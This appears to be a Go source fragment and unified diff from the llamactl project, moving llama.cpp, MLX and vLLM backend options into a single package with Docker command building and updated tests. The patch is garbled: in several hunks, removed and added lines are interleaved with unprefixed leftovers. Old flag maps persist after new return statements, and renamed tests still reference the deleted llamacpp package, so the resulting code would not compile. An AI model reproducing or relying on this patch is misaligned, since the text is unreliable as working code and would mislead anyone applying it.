 		*Alias
 	}{
 		Alias: (*Alias)(o),
 	}
 	if err := json.Unmarshal(data, aux); err != nil {
 		return err
 	}
 	// Nothing to materialize when no backend options were supplied.
 	if o.BackendOptions == nil {
 		return nil
 	}
 	newBackend, known := backendConstructors[o.BackendType]
 	if !known {
 		return fmt.Errorf("unsupported backend type: %s", o.BackendType)
 	}
 	impl := newBackend()
 	// Round-trip the generic map through JSON to populate the typed struct.
 	raw, err := json.Marshal(o.BackendOptions)
 	if err != nil {
 		return fmt.Errorf("failed to marshal backend options: %w", err)
 	}
 	if err := json.Unmarshal(raw, impl); err != nil {
 		return fmt.Errorf("failed to unmarshal backend options: %w", err)
 	}
 	// Keep the typed field in sync for code that reads it directly.
 	o.setBackendOptions(impl)
 	return nil
 }
 // MarshalJSON encodes Options, regenerating backend_options from the typed
 // options struct selected by backend_type.
 //
 // The alias wrapper points at the receiver itself, so the regenerated map is
 // also written to o.BackendOptions as a side effect.
 func (o *Options) MarshalJSON() ([]byte, error) {
 	// Alias drops the methods of Options to avoid recursing into MarshalJSON.
 	type Alias Options
 	aux := &struct {
 		*Alias
 	}{
 		Alias: (*Alias)(o),
 	}
 	if impl := o.getBackend(); impl != nil {
 		// Round-trip the typed struct through JSON to obtain the generic map.
 		raw, err := json.Marshal(impl)
 		if err != nil {
 			return nil, fmt.Errorf("failed to marshal backend options: %w", err)
 		}
 		if err := json.Unmarshal(raw, &aux.BackendOptions); err != nil {
 			return nil, fmt.Errorf("failed to unmarshal backend options to map: %w", err)
 		}
 	}
 	return json.Marshal(aux)
 }
 // setBackendOptions assigns bcknd to the typed field matching its concrete
 // type. Values of any other type (including a nil interface) are ignored.
 func (o *Options) setBackendOptions(bcknd backend) {
 	if llama, ok := bcknd.(*LlamaServerOptions); ok {
 		o.LlamaServerOptions = llama
 		return
 	}
 	if mlx, ok := bcknd.(*MlxServerOptions); ok {
 		o.MlxServerOptions = mlx
 		return
 	}
 	if vllm, ok := bcknd.(*VllmServerOptions); ok {
 		o.VllmServerOptions = vllm
 	}
 }
 // getBackendSettings returns a pointer to the section of backendConfig that
 // belongs to o.BackendType, or nil when the backend type is not recognized.
 func (o *Options) getBackendSettings(backendConfig *config.BackendConfig) *config.BackendSettings {
 	if o.BackendType == BackendTypeLlamaCpp {
 		return &backendConfig.LlamaCpp
 	}
 	if o.BackendType == BackendTypeMlxLm {
 		return &backendConfig.MLX
 	}
 	if o.BackendType == BackendTypeVllm {
 		return &backendConfig.VLLM
 	}
 	return nil
 }
 // getBackend returns the backend implementation selected by o.BackendType, or
 // a true nil interface when the type is unknown or the matching typed options
 // field has not been set.
 //
 // Each pointer is checked before it is returned: handing back a nil
 // *LlamaServerOptions (etc.) directly would wrap it in a non-nil interface
 // value, so callers' `backend != nil` guards would pass and the following
 // method call would dereference a nil pointer.
 func (o *Options) getBackend() backend {
 	switch o.BackendType {
 	case BackendTypeLlamaCpp:
 		if o.LlamaServerOptions != nil {
 			return o.LlamaServerOptions
 		}
 	case BackendTypeMlxLm:
 		if o.MlxServerOptions != nil {
 			return o.MlxServerOptions
 		}
 	case BackendTypeVllm:
 		if o.VllmServerOptions != nil {
 			return o.VllmServerOptions
 		}
 	}
 	return nil
 }
 // isDockerEnabled reports whether the instance should be launched through
 // Docker: the settings must carry an enabled Docker section and the backend
 // must not be MLX, for which Docker is never used.
 //
 // A nil settings pointer (returned by getBackendSettings for an unrecognized
 // backend type) yields false instead of a nil-pointer panic.
 func (o *Options) isDockerEnabled(backend *config.BackendSettings) bool {
 	if backend == nil || backend.Docker == nil {
 		return false
 	}
 	return backend.Docker.Enabled && o.BackendType != BackendTypeMlxLm
 }
 // IsDockerEnabled reports whether Docker execution applies to this instance,
 // based on the settings for its backend type in backendConfig.
 func (o *Options) IsDockerEnabled(backendConfig *config.BackendConfig) bool {
 	return o.isDockerEnabled(o.getBackendSettings(backendConfig))
 }
 // GetCommand returns the executable used to start the backend: "docker" when
 // Docker execution is enabled, otherwise the command configured for the
 // backend.
 func (o *Options) GetCommand(backendConfig *config.BackendConfig) string {
 	settings := o.getBackendSettings(backendConfig)
 	if !o.isDockerEnabled(settings) {
 		return settings.Command
 	}
 	return "docker"
 }
 // BuildCommandArgs assembles the full argument list for launching the backend.
 //
 // Under Docker the list is the configured Docker args, the image name, then
 // the backend's Docker args. For native execution it is the configured
 // backend args followed by the backend's command args. A nil slice is
 // returned when no backend implementation is available.
 func (o *Options) BuildCommandArgs(backendConfig *config.BackendConfig) []string {
 	settings := o.getBackendSettings(backendConfig)
 	impl := o.getBackend()
 	if impl == nil {
 		return nil
 	}
 	var args []string
 	if !o.isDockerEnabled(settings) {
 		// Native execution: configured args first, then instance args.
 		args = append(args, settings.Args...)
 		return append(args, impl.BuildCommandArgs()...)
 	}
 	// Docker execution: docker args, image, then instance args.
 	args = append(args, settings.Docker.Args...)
 	args = append(args, settings.Docker.Image)
 	return append(args, impl.BuildDockerArgs()...)
 }
 // BuildEnvironment merges the environment variables for the backend process
 // into a new map. Later sources override earlier ones: backend-level
 // environment, then Docker environment (only when Docker is enabled), then
 // the per-instance environment passed in.
 func (o *Options) BuildEnvironment(backendConfig *config.BackendConfig, environment map[string]string) map[string]string {
 	settings := o.getBackendSettings(backendConfig)
 	merged := make(map[string]string)
 	// maps.Copy is a no-op for a nil source map, so no nil checks are needed.
 	maps.Copy(merged, settings.Environment)
 	if o.isDockerEnabled(settings) {
 		maps.Copy(merged, settings.Docker.Environment)
 	}
 	maps.Copy(merged, environment)
 	return merged
 }
 // GetPort returns the port from the active backend options, or 0 when no
 // backend is available.
 func (o *Options) GetPort() int {
 	impl := o.getBackend()
 	if impl == nil {
 		return 0
 	}
 	return impl.GetPort()
 }
 // SetPort stores port in the active backend options; it does nothing when no
 // backend is available.
 func (o *Options) SetPort(port int) {
 	if impl := o.getBackend(); impl != nil {
 		impl.SetPort(port)
 	}
 }
 // GetHost returns the host from the active backend options, falling back to
 // "localhost" when no backend is available.
 func (o *Options) GetHost() string {
 	impl := o.getBackend()
 	if impl == nil {
 		return "localhost"
 	}
 	return impl.GetHost()
 }
 // GetResponseHeaders returns the response headers configured for this
 // instance's backend type.
 func (o *Options) GetResponseHeaders(backendConfig *config.BackendConfig) map[string]string {
 	return o.getBackendSettings(backendConfig).ResponseHeaders
 }
 // ValidateInstanceOptions delegates validation to the active backend options.
 // It returns a validation error when no backend is available for the
 // configured backend type.
 func (o *Options) ValidateInstanceOptions() error {
 	if impl := o.getBackend(); impl != nil {
 		return impl.Validate()
 	}
 	return validation.ValidationError(fmt.Errorf("backend options cannot be nil for backend type %s", o.BackendType))
 }
--- a/pkg/backends/builder.go
+++ b/pkg/backends/builder.go
@@ -1,13 +1,15 @@
 package backends
 import (
 	"fmt"
 	"llamactl/pkg/config"
 	"reflect"
 	"strconv"
 	"strings"
 )
 // BuildCommandArgs converts a struct to command line arguments
-func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
+func BuildCommandArgs(options any, multipleFlags map[string]struct{}) []string {
 	var args []string
 	v := reflect.ValueOf(options).Elem()
@@ -26,9 +28,10 @@ func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
 			continue
 		}
-		// Get flag name from JSON tag
+		// Get flag name from JSON tag (snake_case)
-		flagName := strings.Split(jsonTag, ",")[0]
+		jsonFieldName := strings.Split(jsonTag, ",")[0]
-		flagName = strings.ReplaceAll(flagName, "_", "-")
+		// Convert to kebab-case for CLI flags
 		flagName := strings.ReplaceAll(jsonFieldName, "_", "-")
 		switch field.Kind() {
 		case reflect.Bool:
@@ -49,7 +52,8 @@ func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
 			}
 		case reflect.Slice:
 			if field.Type().Elem().Kind() == reflect.String && field.Len() > 0 {
-				if multipleFlags[flagName] {
+				// Use jsonFieldName (snake_case) for multipleFlags lookup
 				if _, isMultiValue := multipleFlags[jsonFieldName]; isMultiValue {
 					// Multiple flags: --flag value1 --flag value2
 					for j := 0; j < field.Len(); j++ {
 						args = append(args, "--"+flagName, field.Index(j).String())
@@ -68,3 +72,24 @@ func BuildCommandArgs(options any, multipleFlags map[string]bool) []string {
 	return args
 }
 // BuildDockerCommand assembles a Docker invocation for a backend.
 //
 // The returned argument list is, in order: the configured Docker args (which
 // should include "run", "--rm", etc.), one "-e KEY=VALUE" pair per Docker
 // environment entry, the image name, the backend-level args, and finally
 // instanceArgs. The command is always "docker" and the error is always nil.
 func BuildDockerCommand(backendConfig *config.BackendSettings, instanceArgs []string) (string, []string, error) {
 	docker := backendConfig.Docker
 	// Copy so the configured slice is never modified by the appends below.
 	cmdArgs := append([]string{}, docker.Args...)
 	for name, val := range docker.Environment {
 		cmdArgs = append(cmdArgs, "-e", fmt.Sprintf("%s=%s", name, val))
 	}
 	cmdArgs = append(cmdArgs, docker.Image)
 	cmdArgs = append(cmdArgs, backendConfig.Args...)
 	cmdArgs = append(cmdArgs, instanceArgs...)
 	return "docker", cmdArgs, nil
 }
--- a/pkg/backends/llamacpp/llama.go
+++ b/pkg/backends/llamacpp/llama.go
@@ -1,12 +1,26 @@
-package llamacpp
+package backends
 import (
 	"encoding/json"
-	"llamactl/pkg/backends"
+	"fmt"
 	"llamactl/pkg/validation"
 	"reflect"
 	"strconv"
 )
 // llamaMultiValuedFlags is the set of llama-server flags that are repeated
 // once per value (--flag v1 --flag v2) rather than passed as a single
 // comma-separated value.
 // Keys use snake_case as the parser converts kebab-case flags to snake_case before lookup
 // The same set is handed to BuildCommandArgs when generating arguments.
 var llamaMultiValuedFlags = map[string]struct{}{
 	"override_tensor":       {},
 	"override_kv":           {},
 	"lora":                  {},
 	"lora_scaled":           {},
 	"control_vector":        {},
 	"control_vector_scaled": {},
 	"dry_sequence_breaker":  {},
 	"logit_bias":            {},
 }
 type LlamaServerOptions struct {
 	// Common params
 	VerbosePrompt           bool     `json:"verbose_prompt,omitempty"`
@@ -313,44 +327,61 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
 	return nil
 }
 // GetPort returns the port stored in the llama-server options.
 func (o *LlamaServerOptions) GetPort() int {
 	return o.Port
 }
 // SetPort stores port in the llama-server options.
 func (o *LlamaServerOptions) SetPort(port int) {
 	o.Port = port
 }
 // GetHost returns the host stored in the llama-server options.
 func (o *LlamaServerOptions) GetHost() string {
 	return o.Host
 }
 // Validate checks the llama-server options. It rejects a nil receiver, runs
 // the shared string validation over the struct, and requires the port to be
 // within 0-65535.
 func (o *LlamaServerOptions) Validate() error {
 	if o == nil {
 		return validation.ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
 	}
 	// Reflection-based check of all string fields for injection patterns.
 	if err := validation.ValidateStructStrings(o, ""); err != nil {
 		return err
 	}
 	// Basic network validation for the port.
 	if portInRange := o.Port >= 0 && o.Port <= 65535; !portInRange {
 		return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
 	}
 	return nil
 }
 // BuildCommandArgs converts InstanceOptions to command line arguments
 func (o *LlamaServerOptions) BuildCommandArgs() []string {
 	// Llama uses multiple flags for arrays by default (not comma-separated)
-	multipleFlags := map[string]bool{
+	// Use package-level llamaMultiValuedFlags variable
-		"override-tensor":       true,
+	return BuildCommandArgs(o, llamaMultiValuedFlags)
 		"override-kv":           true,
 		"lora":                  true,
 		"lora-scaled":           true,
 		"control-vector":        true,
 		"control-vector-scaled": true,
 		"dry-sequence-breaker":  true,
 		"logit-bias":            true,
 	}
 	return backends.BuildCommandArgs(o, multipleFlags)
 }
-// ParseLlamaCommand parses a llama-server command string into LlamaServerOptions
+func (o *LlamaServerOptions) BuildDockerArgs() []string {
 	// For llama, Docker args are the same as normal args
 	return o.BuildCommandArgs()
 }
 // ParseCommand parses a llama-server command string into LlamaServerOptions
 // Supports multiple formats:
 // 1. Full command: "llama-server --model file.gguf"
 // 2. Full path: "/usr/local/bin/llama-server --model file.gguf"
 // 3. Args only: "--model file.gguf --gpu-layers 32"
 // 4. Multiline commands with backslashes
-func ParseLlamaCommand(command string) (*LlamaServerOptions, error) {
+func (o *LlamaServerOptions) ParseCommand(command string) (any, error) {
 	executableNames := []string{"llama-server"}
 	var subcommandNames []string // Llama has no subcommands
-	multiValuedFlags := map[string]bool{
+	// Use package-level llamaMultiValuedFlags variable
 		"override_tensor":       true,
 		"override_kv":           true,
 		"lora":                  true,
 		"lora_scaled":           true,
 		"control_vector":        true,
 		"control_vector_scaled": true,
 		"dry_sequence_breaker":  true,
 		"logit_bias":            true,
 	}
 	var llamaOptions LlamaServerOptions
-	if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil {
+	if err := parseCommand(command, executableNames, subcommandNames, llamaMultiValuedFlags, &llamaOptions); err != nil {
 		return nil, err
 	}
--- a/pkg/backends/llamacpp/llama_test.go
+++ b/pkg/backends/llamacpp/llama_test.go
@@ -1,71 +1,38 @@
-package llamacpp_test
+package backends_test
 import (
 	"encoding/json"
 	"fmt"
-	"llamactl/pkg/backends/llamacpp"
+	"llamactl/pkg/backends"
 	"llamactl/pkg/testutil"
 	"reflect"
 	"slices"
 	"testing"
 )
-func TestBuildCommandArgs_BasicFields(t *testing.T) {
+func TestLlamaCppBuildCommandArgs_BooleanFields(t *testing.T) {
 	options := llamacpp.LlamaServerOptions{
 		Model:     "/path/to/model.gguf",
 		Port:      8080,
 		Host:      "localhost",
 		Verbose:   true,
 		CtxSize:   4096,
 		GPULayers: 32,
 	}
 	args := options.BuildCommandArgs()
 	// Check individual arguments
 	expectedPairs := map[string]string{
 		"--model":      "/path/to/model.gguf",
 		"--port":       "8080",
 		"--host":       "localhost",
 		"--ctx-size":   "4096",
 		"--gpu-layers": "32",
 	}
 	for flag, expectedValue := range expectedPairs {
 		if !containsFlagWithValue(args, flag, expectedValue) {
 			t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args)
 		}
 	}
 	// Check standalone boolean flag
 	if !contains(args, "--verbose") {
 		t.Errorf("Expected --verbose flag not found in %v", args)
 	}
 }
 func TestBuildCommandArgs_BooleanFields(t *testing.T) {
 	tests := []struct {
 		name     string
-		options  llamacpp.LlamaServerOptions
+		options  backends.LlamaServerOptions
 		expected []string
 		excluded []string
 	}{
 		{
 			name: "verbose true",
-			options: llamacpp.LlamaServerOptions{
+			options: backends.LlamaServerOptions{
 				Verbose: true,
 			},
 			expected: []string{"--verbose"},
 		},
 		{
 			name: "verbose false",
-			options: llamacpp.LlamaServerOptions{
+			options: backends.LlamaServerOptions{
 				Verbose: false,
 			},
 			excluded: []string{"--verbose"},
 		},
 		{
 			name: "multiple booleans",
-			options: llamacpp.LlamaServerOptions{
+			options: backends.LlamaServerOptions{
 				Verbose:   true,
 				FlashAttn: true,
 				Mlock:     false,
@@ -81,13 +48,13 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
 			args := tt.options.BuildCommandArgs()
 			for _, expectedArg := range tt.expected {
-				if !contains(args, expectedArg) {
+				if !testutil.Contains(args, expectedArg) {
 					t.Errorf("Expected argument %q not found in %v", expectedArg, args)
 				}
 			}
 			for _, excludedArg := range tt.excluded {
-				if contains(args, excludedArg) {
+				if testutil.Contains(args, excludedArg) {
 					t.Errorf("Excluded argument %q found in %v", excludedArg, args)
 				}
 			}
@@ -95,38 +62,8 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
 	}
 }
-func TestBuildCommandArgs_NumericFields(t *testing.T) {
+func TestLlamaCppBuildCommandArgs_ZeroValues(t *testing.T) {
-	options := llamacpp.LlamaServerOptions{
+	options := backends.LlamaServerOptions{
 		Port:        8080,
 		Threads:     4,
 		CtxSize:     2048,
 		GPULayers:   16,
 		Temperature: 0.7,
 		TopK:        40,
 		TopP:        0.9,
 	}
 	args := options.BuildCommandArgs()
 	expectedPairs := map[string]string{
 		"--port":       "8080",
 		"--threads":    "4",
 		"--ctx-size":   "2048",
 		"--gpu-layers": "16",
 		"--temp":       "0.7",
 		"--top-k":      "40",
 		"--top-p":      "0.9",
 	}
 	for flag, expectedValue := range expectedPairs {
 		if !containsFlagWithValue(args, flag, expectedValue) {
 			t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args)
 		}
 	}
 }
 func TestBuildCommandArgs_ZeroValues(t *testing.T) {
 	options := llamacpp.LlamaServerOptions{
 		Port:        0,     // Should be excluded
 		Threads:     0,     // Should be excluded
 		Temperature: 0,     // Should be excluded
@@ -146,14 +83,14 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
 	}
 	for _, excludedArg := range excludedArgs {
-		if contains(args, excludedArg) {
+		if testutil.Contains(args, excludedArg) {
 			t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
 		}
 	}
 }
-func TestBuildCommandArgs_ArrayFields(t *testing.T) {
+func TestLlamaCppBuildCommandArgs_ArrayFields(t *testing.T) {
-	options := llamacpp.LlamaServerOptions{
+	options := backends.LlamaServerOptions{
 		Lora:               []string{"adapter1.bin", "adapter2.bin"},
 		OverrideTensor:     []string{"tensor1", "tensor2", "tensor3"},
 		DrySequenceBreaker: []string{".", "!", "?"},
@@ -170,15 +107,15 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
 	for flag, values := range expectedOccurrences {
 		for _, value := range values {
-			if !containsFlagWithValue(args, flag, value) {
+			if !testutil.ContainsFlagWithValue(args, flag, value) {
 				t.Errorf("Expected %s %s, not found in %v", flag, value, args)
 			}
 		}
 	}
 }
-func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
+func TestLlamaCppBuildCommandArgs_EmptyArrays(t *testing.T) {
-	options := llamacpp.LlamaServerOptions{
+	options := backends.LlamaServerOptions{
 		Lora:           []string{}, // Empty array should not generate args
 		OverrideTensor: []string{}, // Empty array should not generate args
 	}
@@ -187,43 +124,13 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
 	excludedArgs := []string{"--lora", "--override-tensor"}
 	for _, excludedArg := range excludedArgs {
-		if contains(args, excludedArg) {
+		if testutil.Contains(args, excludedArg) {
 			t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args)
 		}
 	}
 }
-func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_StandardFields(t *testing.T) {
 	// Test snake_case to kebab-case conversion
 	options := llamacpp.LlamaServerOptions{
 		CtxSize:      4096,
 		GPULayers:    32,
 		ThreadsBatch: 2,
 		FlashAttn:    true,
 		TopK:         40,
 		TopP:         0.9,
 	}
 	args := options.BuildCommandArgs()
 	// Check that field names are properly converted
 	expectedFlags := []string{
 		"--ctx-size",      // ctx_size -> ctx-size
 		"--gpu-layers",    // gpu_layers -> gpu-layers
 		"--threads-batch", // threads_batch -> threads-batch
 		"--flash-attn",    // flash_attn -> flash-attn
 		"--top-k",         // top_k -> top-k
 		"--top-p",         // top_p -> top-p
 	}
 	for _, flag := range expectedFlags {
 		if !contains(args, flag) {
 			t.Errorf("Expected flag %q not found in %v", flag, args)
 		}
 	}
 }
 func TestUnmarshalJSON_StandardFields(t *testing.T) {
 	jsonData := `{
 		"model": "/path/to/model.gguf",
 		"port": 8080,
@@ -234,7 +141,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
 		"temp": 0.7
 	}`
-	var options llamacpp.LlamaServerOptions
+	var options backends.LlamaServerOptions
 	err := json.Unmarshal([]byte(jsonData), &options)
 	if err != nil {
 		t.Fatalf("Unmarshal failed: %v", err)
@@ -263,16 +170,16 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
 	}
 }
-func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 	tests := []struct {
 		name     string
 		jsonData string
-		checkFn  func(llamacpp.LlamaServerOptions) error
+		checkFn  func(backends.LlamaServerOptions) error
 	}{
 		{
 			name:     "threads alternatives",
 			jsonData: `{"t": 4, "tb": 2}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.Threads != 4 {
 					return fmt.Errorf("expected threads 4, got %d", opts.Threads)
 				}
@@ -285,7 +192,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "context size alternatives",
 			jsonData: `{"c": 2048}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.CtxSize != 2048 {
 					return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
 				}
@@ -295,7 +202,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "gpu layers alternatives",
 			jsonData: `{"ngl": 16}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.GPULayers != 16 {
 					return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
 				}
@@ -305,7 +212,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "model alternatives",
 			jsonData: `{"m": "/path/model.gguf"}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.Model != "/path/model.gguf" {
 					return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
 				}
@@ -315,7 +222,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "temperature alternatives",
 			jsonData: `{"temp": 0.8}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.Temperature != 0.8 {
 					return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
 				}
@@ -326,7 +233,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			var options llamacpp.LlamaServerOptions
+			var options backends.LlamaServerOptions
 			err := json.Unmarshal([]byte(tt.jsonData), &options)
 			if err != nil {
 				t.Fatalf("Unmarshal failed: %v", err)
@@ -339,24 +246,24 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 	}
 }
-func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_InvalidJSON(t *testing.T) {
 	invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
-	var options llamacpp.LlamaServerOptions
+	var options backends.LlamaServerOptions
 	err := json.Unmarshal([]byte(invalidJSON), &options)
 	if err == nil {
 		t.Error("Expected error for invalid JSON")
 	}
 }
-func TestUnmarshalJSON_ArrayFields(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_ArrayFields(t *testing.T) {
 	jsonData := `{
 		"lora": ["adapter1.bin", "adapter2.bin"],
 		"override_tensor": ["tensor1", "tensor2"],
 		"dry_sequence_breaker": [".", "!", "?"]
 	}`
-	var options llamacpp.LlamaServerOptions
+	var options backends.LlamaServerOptions
 	err := json.Unmarshal([]byte(jsonData), &options)
 	if err != nil {
 		t.Fatalf("Unmarshal failed: %v", err)
@@ -383,26 +290,81 @@ func TestParseLlamaCommand(t *testing.T) {
 		name      string
 		command   string
 		expectErr bool
 		validate  func(*testing.T, *backends.LlamaServerOptions)
 	}{
 		{
 			name:      "basic command",
 			command:   "llama-server --model /path/to/model.gguf --gpu-layers 32",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
 				if opts.Model != "/path/to/model.gguf" {
 					t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model)
 				}
 				if opts.GPULayers != 32 {
 					t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
 				}
 			},
 		},
 		{
 			name:      "args only",
 			command:   "--model /path/to/model.gguf --ctx-size 4096",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
 				if opts.Model != "/path/to/model.gguf" {
 					t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model)
 				}
 				if opts.CtxSize != 4096 {
 					t.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
 				}
 			},
 		},
 		{
 			name:      "mixed flag formats",
 			command:   "llama-server --model=/path/model.gguf --gpu-layers 16 --verbose",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
 				if opts.Model != "/path/model.gguf" {
 					t.Errorf("expected model '/path/model.gguf', got '%s'", opts.Model)
 				}
 				if opts.GPULayers != 16 {
 					t.Errorf("expected gpu_layers 16, got %d", opts.GPULayers)
 				}
 				if !opts.Verbose {
 					t.Errorf("expected verbose to be true")
 				}
 			},
 		},
 		{
 			name:      "quoted strings",
 			command:   `llama-server --model test.gguf --api-key "sk-1234567890abcdef"`,
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
 				if opts.APIKey != "sk-1234567890abcdef" {
 					t.Errorf("expected api_key 'sk-1234567890abcdef', got '%s'", opts.APIKey)
 				}
 			},
 		},
 		{
 			name:      "multiple value types",
 			command:   "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap",
 			expectErr: false,
 			validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
 				if opts.Model != "/test/model.gguf" {
 					t.Errorf("expected model '/test/model.gguf', got '%s'", opts.Model)
 				}
 				if opts.GPULayers != 32 {
 					t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
 				}
 				if opts.Temperature != 0.7 {
 					t.Errorf("expected temperature 0.7, got %f", opts.Temperature)
 				}
 				if !opts.Verbose {
 					t.Errorf("expected verbose to be true")
 				}
 				if !opts.NoMmap {
 					t.Errorf("expected no_mmap to be true")
 				}
 			},
 		},
 		{
 			name:      "empty command",
@@ -423,7 +385,9 @@ func TestParseLlamaCommand(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			result, err := llamacpp.ParseLlamaCommand(tt.command)
+			var opts backends.LlamaServerOptions
 			resultAny, err := opts.ParseCommand(tt.command)
 			result, _ := resultAny.(*backends.LlamaServerOptions)
 			if tt.expectErr {
 				if err == nil {
@@ -439,43 +403,21 @@ func TestParseLlamaCommand(t *testing.T) {
 			if result == nil {
 				t.Errorf("expected result but got nil")
 				return
 			}
 			if tt.validate != nil {
 				tt.validate(t, result)
 			}
 		})
 	}
 }
 // TestParseLlamaCommandValues parses one command containing string, integer,
 // float and boolean flags and verifies each resulting field.
 func TestParseLlamaCommandValues(t *testing.T) {
 	const command = "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap"
 	opts, err := llamacpp.ParseLlamaCommand(command)
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
 	if got := opts.Model; got != "/test/model.gguf" {
 		t.Errorf("expected model '/test/model.gguf', got '%s'", got)
 	}
 	if got := opts.GPULayers; got != 32 {
 		t.Errorf("expected gpu_layers 32, got %d", got)
 	}
 	if got := opts.Temperature; got != 0.7 {
 		t.Errorf("expected temperature 0.7, got %f", got)
 	}
 	if !opts.Verbose {
 		t.Errorf("expected verbose to be true")
 	}
 	if !opts.NoMmap {
 		t.Errorf("expected no_mmap to be true")
 	}
 }
 func TestParseLlamaCommandArrays(t *testing.T) {
 	command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin"
-	result, err := llamacpp.ParseLlamaCommand(command)
+	var opts backends.LlamaServerOptions
 	resultAny, err := opts.ParseCommand(command)
 	result, _ := resultAny.(*backends.LlamaServerOptions)
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
@@ -492,20 +434,3 @@ func TestParseLlamaCommandArrays(t *testing.T) {
 		}
 	}
 }
 // Helper functions
 // contains reports whether item occurs anywhere in slice.
 func contains(slice []string, item string) bool {
 	position := slices.Index(slice, item)
 	return position >= 0
 }
 // containsFlagWithValue reports whether flag appears in args immediately
 // followed by value. A flag in the last position has no value and never matches.
 func containsFlagWithValue(args []string, flag, value string) bool {
 	// Stop one short of the end so args[idx+1] is always in range.
 	for idx := 0; idx+1 < len(args); idx++ {
 		if args[idx] == flag && args[idx+1] == value {
 			return true
 		}
 	}
 	return false
 }
--- a/pkg/backends/mlx/mlx.go
+++ b/pkg/backends/mlx/mlx.go
@@ -1,7 +1,8 @@
-package mlx
+package backends
 import (
-	"llamactl/pkg/backends"
+	"fmt"
 	"llamactl/pkg/validation"
 )
 type MlxServerOptions struct {
@@ -30,25 +31,58 @@ type MlxServerOptions struct {
 	MaxTokens int     `json:"max_tokens,omitempty"`
 }
-// BuildCommandArgs converts to command line arguments
+func (o *MlxServerOptions) GetPort() int {
-func (o *MlxServerOptions) BuildCommandArgs() []string {
+	return o.Port
 	multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields
 	return backends.BuildCommandArgs(o, multipleFlags)
 }
-// ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions
+func (o *MlxServerOptions) SetPort(port int) {
 	o.Port = port
 }
 // GetHost returns the Host field of the MLX server options.
 func (o *MlxServerOptions) GetHost() string {
 	host := o.Host
 	return host
 }
 // Validate checks the MLX server options and returns the first problem found:
 // a nil receiver, an error from validation.ValidateStructStrings, or a port
 // outside 0-65535. It returns nil when all checks pass.
 func (o *MlxServerOptions) Validate() error {
 	if o == nil {
 		return validation.ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
 	}
 	stringsErr := validation.ValidateStructStrings(o, "")
 	if stringsErr != nil {
 		return stringsErr
 	}
 	// Basic network validation for port
 	if portInRange := o.Port >= 0 && o.Port <= 65535; !portInRange {
 		return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
 	}
 	return nil
 }
 // BuildCommandArgs turns the MLX options into command line arguments by
